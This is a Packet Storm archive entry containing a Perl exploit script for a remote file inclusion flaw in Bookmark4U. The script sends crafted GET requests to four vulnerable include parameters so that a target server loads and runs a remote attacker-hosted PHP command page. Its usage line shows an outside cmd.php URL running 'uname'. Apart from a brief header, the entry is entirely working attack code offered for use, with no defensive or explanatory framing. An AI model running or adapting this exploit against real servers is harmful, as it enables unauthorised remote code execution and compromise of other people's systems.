Bookmark4U.pl.txt

2006-06-12T00:00:00
ID PACKETSTORM:47237
Type packetstorm
Reporter Federico Fazzi
Modified 2006-06-12T00:00:00

Description

                                        
                                            `#!/usr/bin/perl  
# Bookmark4U Multiple Remote File Include  
#  
# perl bm4u.pl <remote_addr> <remote_port> <remote_path> <cracked_page_cmd>  
# Federico Fazzi <federico@autistici.org>  
  
use IO::Socket;  
  
if(@ARGV < 4) { &usage; }  
  
my ($host, $port, $path, $cmd, $count);  
my @includers = ("inc/dbase.php?env[include_prefix]=",  
"inc/config.php?env[include_prefix]=",  
"inc/common.php?env[include_prefix]=",  
"inc/function.php?env[include_prefix]=");  
  
# hostname target  
$host = $ARGV[0];  
# port of hostname target  
$port = $ARGV[1];  
# path of bookmark4u  
$path = $ARGV[2];  
  
# url of cracker_cmd  
$cmd = chomp($ARGV[3]);  
  
for($count = 0; $count <=$#includers; $count++) {  
$socket = IO::Socket::INET->new(PeerAddr=>$host,  
PeerPort=>"http($port)", Proto=>'tcp', Timeout=>'2');  
if($socket) {  
print "\ntry $path$includers[$count] string!\n";  
print $socket "GET ".$path."$includers[$count]".$cmd." HTTP/1.1\r\n";  
print $socket "Host: ".$host."\r\n";  
print $socket "Connection: close\r\n\r\n";  
print "sending request string.. done!\n\n";  
if(<$socket>) {  
print <$socket>;  
}  
close($socket);  
}  
}  
  
sub usage {  
print "Bookmark4U Multiple Remote File Include\n";  
print "\$ perl bm4u.pl 192.168.0.1 80 /[bookmark4u_path/  
http://example/cmd.php?&cmd=uname\n";  
print "Federico Fazzi <federico@autistici.org>\n\n";  
exit(1);  
}  
`